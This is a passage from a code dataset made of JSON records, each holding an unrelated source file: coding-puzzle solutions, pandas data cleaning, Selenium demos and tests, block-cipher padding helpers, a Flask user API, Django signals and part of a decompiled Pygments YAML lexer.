parameters:\n# 1. INTEGER steps\n# 2. STRING path\n#\n\ndef countingValleys(steps, path):\n # Write your code here\n valleys_cnt = 0 \n height = 0\n for idx, p in enumerate(path):\n unit = {'D': -1, 'U': 1}.get(p)\n if idx > 0 and height < 0 and height + unit == 0:\n valleys_cnt += 1 \n height += unit\n \n return valleys_cnt\n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n steps = int(input().strip())\n\n path = input()\n\n result = countingValleys(steps, path)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","sub_path":"archive-dhkim/hackerrank/interview_preparation_kit/01_warmup_challenges/counting_valleys.py","file_name":"counting_valleys.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"402335280","text":"import pandas as pd\r\nimport numpy as np\r\nfrom collections import Counter\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\n# Create your df here:\r\ndf = pd.read_csv(\"profiles.csv\")\r\npd.set_option('display.max_columns', None)\r\n\r\n\r\n#Mapping values to certain features\r\ndrinks_mapping = {'not at all': 0, 'rarely': 1, 'socially': 2, 'often': 3, 'very often': 4, 'desperately': 5}\r\nsmokes_mapping = {'no': 0, 'trying to quit': 1, 'sometimes': 2, 'when drinking': 3, 'yes': 4}\r\ndrugs_mapping = {'never': 0, 'sometimes': 1, 'often': 2}\r\nsex_mapping = {'m': 0, 'f': 1}\r\nwork = 'working on '\r\ndrop = 'dropped out of '\r\ngrad = 'graduated from '\r\n#An attempt to rank education both on level of schooling and whether the individual finished or not\r\neducation_mapping = {\r\n '{}high school'.format(drop): 0,\r\n '{}high school'.format(work): 1,\r\n 'high school': 2,\r\n '{}high school'.format(grad): 3,\r\n '{}space camp'.format(drop): 0,\r\n '{}space camp'.format(work): 1,\r\n 'space camp': 2,\r\n '{}space camp'.format(grad): 3,\r\n '{}two-year college'.format(drop): 1,\r\n '{}two-year college'.format(work): 2,\r\n 'two-year college': 3,\r\n '{}two-year college'.format(grad): 4,\r\n '{}college/university'.format(drop): 2,\r\n '{}college/university'.format(work): 3,\r\n 'college/university': 4,\r\n '{}college/university'.format(grad): 5,\r\n '{}masters program'.format(drop): 3,\r\n '{}masters program'.format(work): 4,\r\n 'masters program': 5,\r\n '{}masters program'.format(grad): 6,\r\n '{}med school'.format(drop): 3,\r\n '{}med school'.format(work): 4,\r\n 'med school': 5,\r\n '{}med school'.format(grad): 6,\r\n '{}law school'.format(drop): 3,\r\n '{}law school'.format(work): 4,\r\n 'law school': 5,\r\n '{}law school'.format(grad): 6,\r\n\r\n}\r\n\r\n#Attempting to rank diet based on how strict/loose someone is with their diet, so diets with more restrictions are rated higher\r\n#and people who said \"strictly\" were ranked highest within each category of diet\r\ndiet_mapping = {\r\n 'anything': 0,\r\n 'mostly anything': 1,\r\n 'strictly anything': 2,\r\n 'mostly vegetarian': 3,\r\n 'vegetarian': 4,\r\n 'strictly vegetarian': 5,\r\n 'mostly vegan': 6,\r\n 'vegan': 7,\r\n 'strictly vegan': 8,\r\n 'mostly other': 2,\r\n 'other': 3,\r\n 'strictly other': 4,\r\n 'mostly halal': 1,\r\n 'halal': 2,\r\n 'strictly halal': 3,\r\n 'mostly kosher': 1,\r\n 'kosher': 2,\r\n 'strictly kosher': 3\r\n}\r\n\r\n#Editing the rows in df['sign'] so they all just say the sign and can be used in further machine learning algorithms\r\nsigns = ['aquarius', 'aries', 'taurus', 'gemini', 'cancer', 'leo',\r\n 'virgo', 'libra', 'scorpio', 'sagittarius', 'capricorn', 'pisces'\r\n ]\r\n\r\ndf.dropna(subset=['sign'], inplace=True)\r\ndf['sign_refined'] = np.where(df['sign'].str.contains(signs[0]), signs[0],\r\n np.where(df['sign'].str.contains(signs[1]), signs[1],\r\n np.where(df['sign'].str.contains(signs[2]), signs[2],\r\n np.where(df['sign'].str.contains(signs[3]), signs[3],\r\n np.where(df['sign'].str.contains(signs[4]), signs[4],\r\n np.where(df['sign'].str.contains(signs[5]), signs[5],\r\n np.where(df['sign'].str.contains(signs[6]), signs[6],\r\n np.where(df['sign'].str.contains(signs[7]), signs[7],\r\n np.where(df['sign'].str.contains(signs[8]), signs[8],\r\n np.where(df['sign'].str.contains(signs[9]), signs[9],\r\n np.where(df['sign'].str.contains(signs[10]), signs[10],\r\n np.where(df['sign'].str.contains(signs[11]), signs[11],\r\n 'No'))))))))))))\r\n\r\n\r\n#Adding the maps to the dataframe\r\ndf['drinks_code'] = df.drinks.map(drinks_mapping)\r\ndf['drugs_code'] = df.drugs.map(drugs_mapping)\r\ndf['smokes_code'] = df.smokes.map(smokes_mapping)\r\ndf['education_code'] = df.education.map(education_mapping)\r\ndf['diet_code'] = df.diet.map(diet_mapping)\r\ndf['sex_code'] = df.sex.map(sex_mapping)\r\ndf['income_reported'] = df.income.drop(df[df.income == -1].index) #There was some weird data in income that I had to remove\r\n\r\n\r\nessay_cols = [\"essay0\",\"essay1\",\"essay2\",\"essay3\",\"essay4\",\"essay5\",\"essay6\",\"essay7\",\"essay8\",\"essay9\"]\r\ndrop_words = [\"essay0\",\"essay1\",\"essay2\",\"essay3\",\"essay4\",\"essay5\",\"essay6\",\"essay7\",\"essay8\",\"essay9\"]\r\n\r\n#Combining the essays\r\n#df['all_essays'] = all_essays.apply(lambda x: str(x).lower().split(), axis=1).reset_index(drop=True)\r\nall_essays = df[essay_cols].apply(lambda x: str(x).lower(), axis=1).reset_index(drop=True)\r\ndf['all_essays'] = df[essay_cols].apply(lambda x: str(x).lower(), axis=1).reset_index(drop=True)\r\ndf['essay_length'] = df['all_essays'].apply(lambda x: str(x).split()).apply(lambda x: len(x))\r\n\r\n# Removing the NaNs\r\ndf.dropna(subset=essay_cols, inplace=True)\r\ndf.to_pickle(\"clean_df\")\r\n","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"190037289","text":"\"\"\"\n@File : 3_获取文本_.1_HHHTRQRL_Login.py\n@Time : 2020/5/14 4:08 下午\n@Author : FeiLong\n@Software: PyCharm\n\"\"\"\nfrom selenium import webdriver\n\n# 加r的目的是防止转译,获取驱动的路径时直接把驱动拖入终端就会出现路径\nweb_driver=webdriver.Chrome(r'/Users/feilong/02_应用/chromedriver_mac64/chromedriver')\n\nweb_driver.get('http://f.python3.vip/webauto/sample1.html')\n\n# find_elements_by_class_name()根据类名获取所有元素,找不到元素会抛出空列表\nclass_names=web_driver.find_elements_by_class_name('plant')\n# 由于获取到的内容是列表,所以循环列表加上.text可以得到文本\nfor i in class_names:\n print(i.text)\n\n# find_element_by_class_name()根据类名获取第一个元素,找不到元素会抛出异常\nclass_name=web_driver.find_element_by_class_name('animal')\n# 由于获取的是一个内容,所以直接.text就会得到文本\nprint(class_name.text)\n\nweb_driver.quit()","sub_path":"10_Demo_Selenium/3_Selenium操作元素/3_获取文本_.text.py","file_name":"3_获取文本_.text.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"182059929","text":"# PROBLEM DESCRIPTION:\n# Given an array of intervals where intervals[i] = [starti, endi], merge all overlapping intervals,\n# and return an array of the non-overlapping intervals that cover all the intervals in the input.\n# \n# EXAMPLE 1:\n# INPUT OUTPUT:\n# intervals = [[1,3],[2,6],[8,10],[15,18]] [[1,6],[8,10],[15,18]]\n# EXPLANATION: Since intervals [1,3] and [2,6] overlaps, merge them into [1,6].\n#\n# EXAMPLE 2:\n# INPUT OUTPUT:\n# intervals = [[1,4],[4,5]] [[1,5]]\n# EXPLANATION: Intervals [1,4] and [4,5] are considered overlapping.\n# \n# CONSTRAINTS:\n# 1 <= intervals.length <= 104\n# intervals[i].length == 2\n# 0 <= starti <= endi <= 104\n\nclass Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n if not intervals:\n return [[]]\n \n # sort intervals as there is no sequence defined\n intervals.sort(key= lambda x: x[0])\n \n result = []\n start, end = intervals[0]\n for interval in intervals[1:]:\n if interval[0] <= end:\n # take max of end as for intervals like -- [[1,4], [2,3]] --> [[1,4]]\n end = max(end, interval[1])\n else:\n result.append([start, end])\n start, end = interval[0], interval[1]\n \n result.append([start, end])\n return result","sub_path":"leetcode/merge_intervals.py","file_name":"merge_intervals.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"245775948","text":"from myutils import strxor\n\ndef pad_size(data_size, blocksize):\n if data_size < blocksize:\n return blocksize - data_size\n if data_size % blocksize == 0:\n return 0\n return blocksize - data_size % blocksize\n\n\ndef pad2(data, blocksize):\n return data + b\"\\x80\" + b\"\\x00\" * pad_size(len(data) + 1, blocksize)\n\n\ndef unpad2(data, blocksize):\n last_block = bytearray(data[-blocksize:])\n pad_index = last_block.rfind(b\"\\x80\")\n if pad_index == -1:\n raise ValueError(\"Invalid padding\")\n for c in last_block[pad_index + 1:]:\n if c != 0:\n raise ValueError(\"Invalid padding\")\n return data[:-(blocksize - pad_index)]\n\ndef ecb_encrypt(encrypter, bs, pt):\n if not pt or len(pt) % bs != 0:\n raise ValueError(\"Plaintext is not blocksize aligned\")\n ct = []\n for i in xrange(0, len(pt), bs):\n ct.append(encrypter(pt[i:i + bs]))\n return b\"\".join(ct)\n\n\ndef ecb_decrypt(decrypter, bs, ct):\n if not ct or len(ct) % bs != 0:\n raise ValueError(\"Ciphertext is not blocksize aligned\")\n pt = []\n for i in xrange(0, len(ct), bs):\n pt.append(decrypter(ct[i:i + bs]))\n return b\"\".join(pt)","sub_path":"ecdh_kuzn/kuznechik_modes.py","file_name":"kuznechik_modes.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"290537411","text":"import wx\nimport wx.aui\nfrom .editor import TextEditor\n\nclass frame(wx.Frame):\n def __init__(self):\n super().__init__(None, title='Editor',size=(800,600))\n self.aui_manager = wx.aui.AuiManager(self,wx.aui.AUI_MGR_TRANSPARENT_HINT)\n self.editor_panel = TextEditor(self)\n\n self.aui_manager.AddPane(self.editor_panel, self._get_default_pane_info().CenterPane().Position(0).BestSize(400,-1))\n self.aui_manager.GetArtProvider().SetMetric(wx.aui.AUI_DOCKART_SASH_SIZE,0)\n self.aui_manager.Update()\n #self.Maximize(True)\n self._register_listeners()\n\n def _get_default_pane_info(self):\n return wx.aui.AuiPaneInfo().CaptionVisible(False).PaneBorder(False).CloseButton(False).PinButton(False).Gripper(\n False)\n\n def on_frame_closing(self, e):\n self.aui_manager.UnInit()\n del self.aui_manager\n self.Destroy()\n\n def _register_listeners(self):\n self.Bind(wx.EVT_CLOSE, self.on_frame_closing)","sub_path":"views/frame.py","file_name":"frame.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"326978095","text":"from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\nuser_id = 0\nuser_list = []\n\n@app.route('/', methods=['GET'])\ndef hello():\n return \"Hello World!\"\n\n\n@app.route('/users', methods=['POST', 'GET'])\ndef add_user():\n user_id = len(user_list)\n name = request.form[\"name\"]\n new_user = {\"id\": user_id+1, \"name\": name}\n user_list.append(new_user)\n if request.method == 'POST':\n print(user_list[user_id])\n return jsonify(new_user), 201\n elif request.method == 'GET':\n return jsonify(new_user)\n else:\n return 404\n\n\n@app.route('/users/', methods=['GET', 'DELETE'])\ndef show_user(user_id):\n if request.method == 'GET':\n if user_id <= len(user_list):\n print(user_list[user_id-1])\n return jsonify(user_list[user_id-1])\n else:\n print(\"No user with this ID\")\n return \"User Not Found\",404\n elif request.method == 'DELETE':\n if user_id <= len(user_list):\n del user_list[user_id-1]\n return \"user deleted\",204\n else:\n return \"No such user\",400\n else:\n return \"Method not supported\"\n","sub_path":"quizzes/quizz2/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"301030881","text":"#Copyright (C) 2015 DigiPen Institute of Technology.\n#Reproduction or disclosure of this file or its contents without\n#the prior written consent of DigiPen Institute of Technology is\n#prohibited.\n\nimport KeplerComposite\nimport random\nimport Directions\n\nMoveWaitGen = lambda : max(random.gauss(2.0, 0.5), 1.0)\n\nclass MinionLogicComponent:\n def Initialize(self):\n KeplerComposite.Connect(self.Space, 'LogicUpdate', self.Update)\n KeplerComposite.Connect(self.Owner, 'SharedCell', self.SharedCell)\n KeplerComposite.Connect(self.Owner, 'OutOfHealth', self.OnOutOfHealth)\n self.MoveTimer = 0\n self.MoveWait = MoveWaitGen()\n self.__light = None\n\n def Free(self):\n self.Space.MinionSpawner.MinionCount -= 1\n\n def OnOutOfHealth(self):\n self.Owner.Dispatch('MinionDied')\n\n def SharedCell(self, obj):\n if obj.HasComponent('PlayerLogic') and self.Owner.PlayerHealth.IsAlive:\n obj.Dispatch('DoDamage', 1)\n self.Owner.Dispatch('DoDamage', 1)\n\n def Update(self, dt):\n self.MoveTimer += dt\n\n self.Owner.Renderable.EmmisiveTint = self.Space.MinionSpawner.MinionGlow\n\n while self.MoveTimer > self.MoveWait:\n gridSpace = self.Space.GridSpace\n directions = []\n\n for name,offset in Directions.DirectionOffsets.items():\n\n if gridSpace.CanMove(self.Owner, offset[0], offset[1]):\n p = self.Owner.Transform.Position + Directions.ToVec3(offset)\n objects = gridSpace.GetGridObjects(p.x, p.z)\n\n isMinion = False\n for obj in objects:\n if obj.HasComponent('MinionLogic'):\n isMinion = True\n break\n\n if not isMinion:\n directions.append(name)\n\n if directions:\n d = random.choice(directions)\n self.Owner.Turn.Move(d)\n self.MoveTimer -= self.MoveWait\n\n self.MoveWait = MoveWaitGen()\n\n @property\n def Light(self):\n return self.__light\n\n @Light.setter\n def Light(self, value):\n self.__light = value\n\n\nKeplerComposite.RegisterComponent(MinionLogicComponent, 'MinionLogic')\n","sub_path":"Kepler/Scale/Content/Components/MinionLogicComponent.py","file_name":"MinionLogicComponent.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"32573801","text":"import requests,json,re,sys\r\n#---------------------------------\r\n\r\n#Initialising Dictionary\r\nD_invest = {} #Dictionary which will container Investor:[List of Company He/She Invested]\r\nD_value = {} #Dictionary which will contain Comany:Valuation By Investor\r\nD_avg = {} #Dictionary which will contain Investor:Toatl Amount invested\r\ndef extractInfo(url):\r\n if(len(url)>0):\r\n #----------------------------\r\n #Getting JSON Data From URL Using Requests Module\r\n try:\r\n r = requests.get('https://gist.githubusercontent.com/murtuzakz/4bd887712703ff14c9b0f7c18229b332/raw/d0dd1c59016e2488dcbe0c8e710a1c5df9c3672e/season7.json')\r\n except requests.exceptions.RequestException as e:\r\n print(\"Oops! Kindly Check your Internet Connection\")\r\n sys.exit(1)\r\n else:\r\n data = json.loads(r.text)#Loading JSON Data\r\n\r\n #-------------------------------\r\n #Regular Expression Used For Searching Particular Pattern Or Extracting Out Particular String\r\n investor = re.compile(\"investors\")\r\n name = re.compile(\"Kevin\")\r\n thousand = re.compile(\"\\$((\\d+\\.\\d+)|(\\d+))K\")\r\n million = re.compile(\"\\$((\\d+\\.\\d+)|(\\d+))M\")\r\n percentage = re.compile(\"((\\d+)|(\\d+\\.\\d+))%\")\r\n unicode = re.compile(\"\\\\xa0\")\r\n #---------------------------------\r\n #Analysing JSON Data as Dictionary\r\n for key,val in data.items():\r\n L = data[key] #Getting a value of every key which denotes episode as List\r\n #-------------------------------------------\r\n #Now we have lists regarding one episode contain all info as dictionary \r\n for j in range(len(L)):\r\n for k,v in L[j].items():#Going one by one attributes of Dictionary\r\n match = investor .search(k)#Finding a key investors\r\n if(match):\r\n if v:#Accepting those investors who funded\r\n li = []#List of name of investor\r\n temp = v.find(\"and\")#Case where name contains \"and\" just separating them\r\n if(temp > 0):\r\n l = v.replace(\"and\",\",\")\r\n li = l.split(',')\r\n li[0]=li[0].replace('\\n','')\r\n li[1]=li[1].replace('\\n','')\r\n else:\r\n li = v.split(\",\")\r\n for i in li:\r\n if (len(i)>1):\r\n match = name.search(i)\r\n if(match):\r\n lt = i.strip(' ').split(' ')\r\n if (len(lt)>2):\r\n i = lt[0]+\" \"+ lt[1]+lt[2]\r\n else:\r\n i = lt[0]+\" \" +lt[1]\r\n inv_name = i.strip(' ')\r\n D_invest[inv_name]=D_invest.setdefault(inv_name,[])#Creating new key(name of investors) with empty list of companies\r\n comp_name = L[j]['company']['title']#Taking out Company Name\r\n match = unicode.search(comp_name)#Taking care of some unicode character '\\xa0'\r\n if(match):\r\n encoded_str = comp_name.encode('ascii','ignore')#First converting into bytes code\r\n decoded_str = encoded_str.decode('utf-8')#Decoding bytes code\r\n comp_name = decoded_str\r\n D_invest[inv_name].append(comp_name)\r\n else:\r\n D_invest[inv_name].append(comp_name)\r\n D_value[comp_name]=D_value.setdefault(comp_name,1)#Creating new key(name of company) with value(valuation amount)\r\n inv_amount = L[j]['kitna']\r\n m = inv_amount.split('for')#Spliting a string of investing amount\r\n match = thousand.search(m[0])\r\n if(match):\r\n invest_amount = float(match.group(1))*1000#For investment in K\r\n match = million.search(m[0])\r\n if(match):\r\n invest_amount = float(match.group(1))*1000000#For investment in M\r\n match = percentage.search(m[1])\r\n if(match):\r\n percent = float(match.group(1))#For Percentage\r\n final_value = (invest_amount/percent)*100 #Calculating Valuation By Investor of company\r\n D_value[comp_name]=round(final_value)\r\n D_avg[inv_name] = D_avg.setdefault(inv_name,1)#Creating new key(name of investors) with value(Invested Amount)\r\n D_avg[inv_name] += invest_amount\r\n else:\r\n print(\"Empty String Given\")\r\n\r\n\r\n# Getting list of all investors in a sorted order who invested in more number of companies\r\n\r\ndef invComp():\r\n print(\"A list of all the investors that invested, along with the companies they invested in, sorted by the investor with maximum number of investments\")\r\n print(\"---------------------------------------------------------------------------------------------------\")\r\n ranked = sorted(D_invest.items(),key=lambda e:len(e[1]),reverse=True)#Doing Sorting Bases On Number Of Companies\r\n for i in range(len(ranked)):\r\n print(\"\\n{} : {}\".format(ranked[i][0],ranked[i][1]))#Printing As Per Given Format\r\n\r\n#Representing list of company with their predicted full current value\r\n \r\ndef compValue():\r\n print(\"\\nValuation of the comapny by the Investor\")\r\n print(\"--------------------------------------------------------------------------------------------------\")\r\n ranked = sorted(D_value.items(),key=lambda e:e[1],reverse=True)\r\n for i in range(len(ranked)):\r\n print(\"\\n{} : ${}\".format(ranked[i][0],ranked[i][1]))\r\n#Representing Total Amount And Average Amount invested by an Investor\r\n\r\ndef invAvg():\r\n print(\"\\nTotal Amount and Average Amount Invested By an Investor\")\r\n print(\"--------------------------------------------------------------------------------------------------\")\r\n ranked = sorted(D_avg.items(),key=lambda e:e[1],reverse=True)\r\n for i in range(len(ranked)):\r\n print(\"\\n{} : Total Investment ${} : average investment ${:.2f}\".format(ranked[i][0],ranked[i][1],ranked[i][1]/len(D_invest[ranked[i][0]])))\r\n\r\n#-----------------------------------------------\r\n#Main Function\r\nextractInfo('https://gist.githubusercontent.com/murtuzakz/4bd887712703ff14c9b0f7c18229b332/raw/d0dd1c59016e2488dcbe0c8e710a1c5df9c3672e/season7.json')\r\ninvComp()\r\ncompValue()\r\ninvAvg()\r\n\r\n \r\n\r\n \r\n","sub_path":"anuragkrsingh.py","file_name":"anuragkrsingh.py","file_ext":"py","file_size_in_byte":7377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"353625760","text":"import logging\nfrom functools import wraps\n\nfrom django.contrib.auth.models import User, Group\nfrom django.db.models.signals import post_delete, post_save, pre_save\nfrom django.dispatch import receiver\n\nfrom comic.eyra.models import Algorithm, Submission, Benchmark, DataFile\nfrom comic.eyra.tasks import run_submission\n\nlogger = logging.getLogger(__name__)\n\ndef disable_for_loaddata(signal_handler):\n \"\"\"Decorator for disabling a signal handler when using loaddata\"\"\"\n\n @wraps(signal_handler)\n def wrapper(*args, **kwargs):\n if kwargs[\"raw\"]:\n print(f\"Skipping signal for {args} {kwargs}\")\n return\n\n signal_handler(*args, **kwargs)\n\n return wrapper\n\n\n\n@receiver(post_delete, sender=Algorithm)\ndef delete_algorithm_admin_group(\n sender, instance, *args, **kwargs\n):\n if instance.admin_group:\n instance.admin_group.delete()\n\n\n@receiver(post_save, sender=Submission)\n@disable_for_loaddata\ndef run_new_submission(\n instance: Submission = None, created: bool = False, *_, **__\n):\n if created and instance:\n run_submission.delay(str(instance.pk))\n\n\n@receiver(post_delete, sender=Benchmark)\ndef delete_benchmark_admin_group(\n sender, instance, *args, **kwargs\n):\n if instance.admin_group:\n instance.admin_group.delete()\n\n\n@receiver(post_save, sender=User)\n@disable_for_loaddata\ndef add_user_to_default_group(\n instance: User = None, created: bool = False, *_, **__\n):\n if created:\n try:\n instance.groups.add(Group.objects.get(name='default'))\n except Exception as e:\n logger.error('cannot add user to default group: ' + str(e))\n","sub_path":"app/comic/eyra/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"478343729","text":"import time\nimport math\nimport unittest\n\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nanswer = math.log(int(time.time()))\nprint(answer)\n\n\n@pytest.fixture(scope=\"function\")\ndef browser():\n print(\"\\nstart browser for test..\")\n browser = webdriver.Chrome()\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n\n # class TestMainPage1():\n\n\nCT = ''\nlst_addr = ['https://stepik.org/lesson/236895/step/1',\n 'https://stepik.org/lesson/236896/step/1',\n 'https://stepik.org/lesson/236897/step/1',\n 'https://stepik.org/lesson/236898/step/1',\n 'https://stepik.org/lesson/236899/step/1',\n 'https://stepik.org/lesson/236903/step/1',\n 'https://stepik.org/lesson/236904/step/1',\n 'https://stepik.org/lesson/236905/step/1']\n\n\n@pytest.mark.parametrize('lst_addr', lst_addr)\ndef test_guest_should_see_login_link( browser, lst_addr, CT=None):\n link = f'{lst_addr}'\n browser.get(link)\n browser.implicitly_wait(10)\n browser.find_element_by_css_selector \\\n ('[placeholder=\"Напишите ваш ответ здесь...\"]'). \\\n send_keys(str(math.log(int(time.time()))))\n # browser.find_element_by_class_name('submit-submission').\\\n # click()\n WebDriverWait(browser, 6) \\\n .until(EC.element_to_be_clickable\n ((By.CLASS_NAME, 'submit-submission'))) \\\n .click()\n # time.sleep(1)\n\n el_anawer_text = WebDriverWait(browser, 5). \\\n until(EC.visibility_of_element_located\n ((By.CLASS_NAME, \"smart-hints__hint\"))).text\n # class =\"smart-hints__hint\"\n print(el_anawer_text)\n\n if el_anawer_text != 'Correct!':\n CT += el_anawer_text\n else:\n pass\n\n # print(composite_text)\n assert el_anawer_text == 'Correct!'\n\n\nprint(CT)\n\n# if __name__ == '__main__':\n# unittest.main()\n","sub_path":"less_3/pytestes_param/test_param_dz_1.py","file_name":"test_param_dz_1.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"502227444","text":"\"\"\"https://www.acmicpc.net/problem/11497\"\"\"\n\n\n\"\"\"통나무 건너뛰기\"\"\"\n\n# git add week_06/boj_S2_11497_Heegun.py\n# git commit -m \"[김희건] boj 통나무 건너뛰기\"\n\nfrom collections import deque\n\nT = int(input())\n\n\nfor _ in range(T):\n\n N = int(input())\n\n tree = list(map(int,input().split()))\n\n tree.sort()\n\n #print(tree)\n\n result = deque([max(tree)])\n\n for i in range(N-2,-1,-1):\n if i%2 == 0:\n result.appendleft(tree[i])\n else:\n result.append(tree[i])\n\n max_diff = 0\n for i in range(N-1):\n max_diff = max(abs(result[i+1]-result[i]), max_diff)\n\n print(max_diff)\n\n \n\n\n\n \n\n ","sub_path":"week_06/boj_S2_11497_Heegun.py","file_name":"boj_S2_11497_Heegun.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"465412545","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-build-ed191__6/Pygments/pygments/lexers/data.py\n# Compiled at: 2020-01-10 16:25:35\n# Size of source mod 2**32: 19056 bytes\n\"\"\"\n pygments.lexers.data\n ~~~~~~~~~~~~~~~~~~~~\n\n Lexers for data file format.\n\n :copyright: Copyright 2006-2019 by the Pygments team, see AUTHORS.\n :license: BSD, see LICENSE for details.\n\"\"\"\nimport re\nfrom pygments.lexer import RegexLexer, ExtendedRegexLexer, LexerContext, include, bygroups, inherit\nfrom pygments.token import Text, Comment, Keyword, Name, String, Number, Punctuation, Literal, Error\n__all__ = [\n 'YamlLexer', 'JsonLexer', 'JsonBareObjectLexer', 'JsonLdLexer']\n\nclass YamlLexerContext(LexerContext):\n __doc__ = 'Indentation context for the YAML lexer.'\n\n def __init__(self, *args, **kwds):\n (super(YamlLexerContext, self).__init__)(*args, **kwds)\n self.indent_stack = []\n self.indent = -1\n self.next_indent = 0\n self.block_scalar_indent = None\n\n\nclass YamlLexer(ExtendedRegexLexer):\n __doc__ = '\\n Lexer for `YAML `_, a human-friendly data serialization\\n language.\\n\\n .. versionadded:: 0.11\\n '\n name = 'YAML'\n aliases = ['yaml']\n filenames = ['*.yaml', '*.yml']\n mimetypes = ['text/x-yaml']\n\n def something(token_class):\n \"\"\"Do not produce empty tokens.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n if not text:\n return\n yield (\n match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n def reset_indent(token_class):\n \"\"\"Reset the indentation levels.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n context.indent_stack = []\n context.indent = -1\n context.next_indent = 0\n context.block_scalar_indent = None\n yield (match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n def save_indent(token_class, start=False):\n \"\"\"Save a possible indentation level.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n extra = ''\n if start:\n context.next_indent = len(text)\n if context.next_indent < context.indent:\n while context.next_indent < context.indent:\n context.indent = context.indent_stack.pop()\n\n if context.next_indent > context.indent:\n extra = text[context.indent:]\n text = text[:context.indent]\n else:\n context.next_indent += len(text)\n if text:\n yield (\n match.start(), token_class, text)\n if extra:\n yield (\n match.start() + len(text), token_class.Error, extra)\n context.pos = match.end()\n\n return callback\n\n def set_indent(token_class, implicit=False):\n \"\"\"Set the previously saved indentation level.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n if context.indent < context.next_indent:\n context.indent_stack.append(context.indent)\n context.indent = context.next_indent\n if not implicit:\n context.next_indent += len(text)\n yield (\n match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n def set_block_scalar_indent(token_class):\n \"\"\"Set an explicit indentation level for a block scalar.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n context.block_scalar_indent = None\n if not text:\n return\n increment = match.group(1)\n if increment:\n current_indent = max(context.indent, 0)\n increment = int(increment)\n context.block_scalar_indent = current_indent + increment\n if text:\n yield (\n match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n def parse_block_scalar_empty_line(indent_token_class, content_token_class):\n \"\"\"Process an empty line in a block scalar.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n if context.block_scalar_indent is None or len(text) <= context.block_scalar_indent:\n if text:\n yield (\n match.start(), indent_token_class, text)\n else:\n indentation = text[:context.block_scalar_indent]\n content = text[context.block_scalar_indent:]\n yield (match.start(), indent_token_class, indentation)\n yield (match.start() + context.block_scalar_indent,\n content_token_class, content)\n context.pos = match.end()\n\n return callback\n\n def parse_block_scalar_indent(token_class):\n \"\"\"Process indentation spaces in a block scalar.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n if context.block_scalar_indent is None:\n if len(text) <= max(context.indent, 0):\n context.stack.pop()\n context.stack.pop()\n return\n context.block_scalar_indent = len(text)\n else:\n if len(text) < context.block_scalar_indent:\n context.stack.pop()\n context.stack.pop()\n return\n if text:\n yield (\n match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n def parse_plain_scalar_indent(token_class):\n \"\"\"Process indentation spaces in a plain scalar.\"\"\"\n\n def callback(lexer, match, context):\n text = match.group()\n if len(text) <= context.indent:\n context.stack.pop()\n context.stack.pop()\n return\n if text:\n yield (\n match.start(), token_class, text)\n context.pos = match.end()\n\n return callback\n\n tokens = {'root':[\n (\n '[ ]+(?=#|$)', Text),\n (\n '\\\\n+', Text),\n (\n '#[^\\\\n]*', Comment.Single),\n (\n '^%YAML(?=[ ]|$)', reset_indent(Name.Tag), 'yaml-directive'),\n (\n '^%TAG(?=[ ]|$)', reset_indent(Name.Tag), 'tag-directive'),\n (\n '^(?:---|\\\\.\\\\.\\\\.)(?=[ ]|$)', reset_indent(Name.Namespace),\n 'block-line'),\n (\n '[ ]*(?!\\\\s|$)', save_indent(Text, start=True),\n ('block-line', 'indentation'))], \n 'ignored-line':[\n (\n '[ ]+(?=#|$)', Text),\n (\n '#[^\\\\n]*', Comment.Single),\n (\n '\\\\n', Text, '#pop:2')], \n 'yaml-directive':[\n (\n '([ 